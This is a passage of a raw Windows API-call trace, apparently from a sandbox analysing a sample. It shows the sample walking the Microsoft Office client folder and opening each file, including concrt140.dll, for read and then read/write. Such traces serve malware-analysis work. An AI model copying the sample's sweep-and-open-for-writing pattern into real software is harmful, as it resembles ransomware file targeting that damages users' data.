ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x69630)) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.996] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x8683a0f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8683a0f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8683a0f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x77892bc0, cFileName="C2R32.dll", cAlternateFileName="")) returned 1 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0099.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.996] AreFileApisANSI () returned 1 [0099.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll", lpUsedDefaultChar=0x0) returned 56 [0099.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.997] AreFileApisANSI () returned 1 [0099.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0099.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 56 [0099.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.997] GetLastError () returned 0x2 [0099.997] GetLastError () returned 0x2 [0099.997] SetLastError (dwErrCode=0x2) [0099.997] GetLastError () returned 0x2 [0099.997] SetLastError (dwErrCode=0x2) [0099.997] GetLastError () returned 0x2 [0099.997] SetLastError (dwErrCode=0x2) [0099.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.997] AreFileApisANSI () returned 1 [0099.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0099.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 56 [0099.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.998] GetLastError () returned 0x2 [0099.998] GetLastError () returned 0x2 [0099.998] SetLastError (dwErrCode=0x2) [0099.998] GetLastError () returned 0x2 [0099.998] SetLastError (dwErrCode=0x2) [0099.998] GetLastError () returned 0x2 [0099.998] SetLastError (dwErrCode=0x2) [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.998] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x8683a0f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8683a0f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8683a0f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x77892bc0, cFileName="C2R64.dll", cAlternateFileName="")) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0099.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0099.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.999] AreFileApisANSI () returned 1 [0099.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll", lpUsedDefaultChar=0x0) returned 56 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.999] AreFileApisANSI () returned 1 [0099.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0099.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll") returned 56 [0099.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.000] GetLastError () returned 0x2 [0100.000] GetLastError () returned 0x2 [0100.000] SetLastError (dwErrCode=0x2) [0100.000] GetLastError () returned 0x2 [0100.000] SetLastError (dwErrCode=0x2) [0100.000] GetLastError () returned 0x2 [0100.010] SetLastError (dwErrCode=0x2) [0100.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0100.070] AreFileApisANSI () returned 1 [0100.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0100.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0100.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll") returned 56 [0100.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.072] GetLastError () returned 0x2 [0100.072] GetLastError () returned 0x2 [0100.073] SetLastError (dwErrCode=0x2) [0100.073] GetLastError () returned 0x2 [0100.073] SetLastError (dwErrCode=0x2) [0100.073] GetLastError () returned 0x2 [0100.073] SetLastError (dwErrCode=0x2) [0100.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0100.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.074] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd11f68b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd11f68b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd191da0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0100.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0100.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0100.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0100.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.085] AreFileApisANSI () returned 1 [0100.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll", lpUsedDefaultChar=0x0) returned 60 [0100.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.085] AreFileApisANSI () returned 1 [0100.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0100.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0100.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll") returned 60 [0100.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\concrt140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.086] GetFileType (hFile=0x418) returned 0x1 [0100.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.086] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.086] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.086] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.086] CloseHandle (hObject=0x418) returned 1 [0100.087] AreFileApisANSI () returned 1 [0100.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0100.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll") returned 60 [0100.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\concrt140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.087] GetFileType (hFile=0x418) returned 0x1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.087] CloseHandle (hObject=0x418) returned 1 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 